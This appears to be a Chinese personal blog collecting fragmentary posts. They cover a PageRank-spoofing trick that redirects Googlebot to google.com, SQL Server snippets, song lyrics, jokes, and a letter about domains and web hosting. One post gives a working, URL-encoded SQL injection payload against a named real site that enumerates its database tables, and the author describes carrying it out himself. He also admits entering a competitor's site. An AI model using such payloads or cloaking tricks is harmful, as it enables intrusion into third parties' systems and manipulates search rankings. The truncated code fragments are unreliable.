wolfeng's blog

Google PageRank欺骗测试成功,真的是想要多少就多少，呵呵，娱乐！

一个多月前放了个测试页面在网站上 http://www.ugia.cn/pr.php ，这几天google更新了pagerank, 现在你可以看到这个页面的PageRank值为10。现在我终于知道http://www.pr10.darkseoteam.com 的原理了。

原理其实很简单，www.ugia.cn/pr.php 这个页面的pr值其实是 www.google.com的。在这个页面中有一段小程序，如果google bot访问这个页面的话，会利用http301或http302自动转向到www.google.com。那么google bot就以为这个页面是google.com的一个镜像(猜测)。所以pr值也就是google.com的了。

今天我自虐的对一处sql注入点进行注入,把最后的一个注入贴出来,比较变态:
http://club.cinews.net/stock/stockdetail.asp?stockname=跑马地''and%20(Select%20Top%201%20name%20from%20sysobjects%20where%20xtype=char(85)%20and%20status>0%20%20and%20name<>%27%65%63%61%72%64%6D%65%73%73%61%67%65%27%20and%20name<>%27%61%71%5F%73%63%6F%72%65%27%20and%20name<>%27%42%61%64%4C%69%73%74%27%20and%20name<>%27%42%61%6E%6B%55%73%65%72%4C%69%73%74%27%20and%20name<>%27banzhu%27%20and%20name<>%27card%27%20and%20name<>%27cdd_score%27%20and%20name<>%27chess_score%27%20and%20name<>%27cyfd%27%20and%20name<>%27dahu%27%20and%20name<>%27ddz_score%27%20and%20name<>%27ecard%27%20and%20name<>%27ecardlead%27%20and%20name<>%27face%27%20and%20name<>%27facelist%27%20and%20name<>%27friend%27%20and%20name<>%27friendlist%27%20and%20name<>%27geter%27%20and%20name<>%27gift%27%20and%20name<>%27goodslist%27%20and%20name<>%27guesslist%27%20and%20name<>%27gupiaoconfig%27%20and%20name<>%27gz_score%27%20and%20name<>%27job%27%20and%20name<>%27jq_score%27%20and%20name<>%27kehu%27%20and%20name<>%27message%27%20and%20name<>%27mj_score%27%20and%20name<>%27movice%27%20and%20name<>%27news%27%20and%20name<>%27pdk_score%27%20and%20name<>%27propertys%27%20and%20name<>%27sgjq_score%27%20and%20name<>%27stock%27%20and%20name<>%27stockbuylist%27%20and%20name<>%27stocklist%27%20and%20name<>%27stocknews%27%20and%20name<>%27sysmsg%27%20and%20name<>%27tlj_score%27%20and%20name<>%27user8%27%20and%20name<>%27userinfo%27%20and%20name<>%27users%27%20and%20name<>%27wq_score%27%20and%20name<>%27wzq_score%27%20and%20name<>%27xq_score%27%20and%20name<>%27yuelao%27)>0%20;--

说明一下:上面注入是探测sql内的所有数据表,型如and name <>%27card%27 之类的东西,是我一步一步的加的,加一个出一个表,呵呵,比较笨,笨死了,但是我喜欢.

功能：把test表中缺失的identity属性加上。
思路：把test表数据写如临时表，然后删除test表，重建test表，设置test的identity_insert为on，然后把临时表的数据导入test，直接在查询分析器了执行即可，呵呵。
select distinct * into #Tmp from test
drop table test
CREATE TABLE test (

A. 如有必要，重置当前标识值
下例在必要的情况下重置 jobs 表的当前标识值。

USE pubs
GO

这几天一直在听两首歌，一首是王菲的《约定》，一首是马郁的《如果下辈子我还记得你》，前者是n年前就熟识的旧作，后者是老彭推荐的新歌，我喜欢。
我喜欢王菲版《约定》的歌词，比周惠版的要好上几个数量级，林夕是写情歌小调的高手，他有特别的关照王菲，总是把最美妙的词句给他吟唱：
还记得当天旅馆的门牌
还留住笑著离开的神态
当天整个城市那样轻快

我不否认进入过慧*(阿里巴巴的竞争对手)的网站——那是两个多月前的匆匆进出，现在忍不住批评一下慧*懒散的安全机制——他的管理员居然两个月来都没有仔细的查看过日志的事情姑且放到一边，先看一段在每个行业模块中都广泛使用的网上商城管理员登陆的检校文件：
<%@ Language=VBScript %>
<%
Response.Buffer =true
%>

年初在苏州的某个晚上，遇到一个算命的，说我今年命犯桃花——我忙对身旁的女友说，你不要着急，这些年来我一直都桃花不散，聚而成林，果实累累，情何以堪……
      许多年来，我遇到许多女人，并在一个时间段内专注的为之付出，有的天涯相隔，有的无疾而终，更多的在时光里沦为朋友，直到遇到现在的女友才算修成正果。
      人面不知何处去，却在我的匣子里充满着她们的信件和我的草稿，在电脑的某些角落里藏掖着痴情的email和我熬夜为某个节日精心炮制的软件，我是个贪恋过去的人——或许贪恋的是那许多的心血和感觉，所以我总会有意无意的翻看他们，整理他们，亏得女友是个宽容的人，她聪明的意识到对我的放纵反而能让我更加具备自省和自制，在她的放纵里我得以拟一个“再见桃花”的栏目，贴一些写给女人的东西，得以在无边得回忆和憧憬里再见桃花。

1、上海的缩写是sh，所以上海IT人的简称是shit，听人说了之后，我便打消了去上海从业的念头，^_^。
2、前些日子在苏州，经常路过苏州电视台——简称是sbs，我问老婆你知道这是什么意思吗，是“SB”的复数形式，妻遂绝倒。
3、去年在滨江道，看到一个自然美理容中心——nature beutiful，缩写是“NB”，真是够nb的。
4、这几天，鞍山西道原昆仑电脑城那儿，树起个广告招商牌，内容是：干it的，谁想出大风头，我告诉朋友，应该这样读：干她的，……

下午得到你电话的两次光顾，心喜声怯，只因美工曾向我历数被他大姐vs准大姐夫，二姐vs准二姐夫无边情话的折磨以及我给你的电话所带来的类似痛苦，才忍痛和你诀别，诀别——怎么用这么不吉利的话。
    第一个电话，基本没什么内容，以情取胜，第二个电话，意料之外，创意可嘉，其中有一个小小的内容就是你的姐姐和她的同事要做一个团委的网站，弥补无聊（本词组纯属个人观点），所以你要让我这颗金子适时发亮了。
    其实，即使抛却表演的成分我也乐意帮忙（美工尝把这个词解释成指点），因为她是你姐姐呀，你姐姐就是我姐姐，你姐姐的同事就是我的同事……，我本来想这样巴结的，但是发现这个肉麻的逻辑有个可怕的漏洞，如果我们假定这个逻辑是合法的，那么接下来有两个推论，即你姐姐的夫婿就是我的夫婿，你姐姐夫婿的爱人就是我的·#·——我只是用了两个合理的循环，便取得了特别权限———这就是所谓黑客查找漏洞的惯用思路，unicode漏洞便是一例，也是我首选的入侵手法。
    该说正题了，让我们继续推理的前进，既然称为网站，也就是说必须把它放在网络之中（废话），但是访问和被访问不是一个状态，所以它也不同于拨号上网，最大的区别在于我们必须保证别人能够访问和较容易的访问，能够访问的底线是必须有固定分配的ip，而拨号上网的ip是动态的——当然isdn和宽带的ip是固定的，也就是说，如果你的终端（电脑）有固定的ip，可以一天24小时连接internet，那么你可以把网站放在本机，如果没有条件，只能在网上申请空间——空间有免费的，有收费的，丰俭由君。能够让人容易访问的底线是你必须申请一个域名——不要指望别人在地址栏里输入你的ip来打开网页——只有我和某些心怀叵测的人才会这么做，才会把一个个域名ping出ip进行扫描——又跑题了，刚才我讲了ping 域名便可的到该地址的ip，那么很明显域名便是ip的一个容易记忆的标志——一般的访问机制是你在地址栏了输入域名，比如163.com，然后进行域名解析，指向相应的ip，所以一个域名是必须的——有免费的，有收费的，丰俭由君，不过通常你免费的到的域名是一个二级域名或是三级域名，免费的顶级域名我也见过，都是国外的。现在一个顶级域名差不多200元/年——这是我的弱项，从不关心价格———前些年好象由于某人抢先注册了一个business.com的域名卖了好几百万——我说的可是美元。
    写了这么多，其实都是废话，如果你要仔细去读，也许会更不知所云，一言以蔽之，就是建网站的前提是要申请一个域名和空间——如果有什么东西找不到，比如哪里有免费的空间，到www.google.com上搜一下吧，我喜欢这个搜索引擎。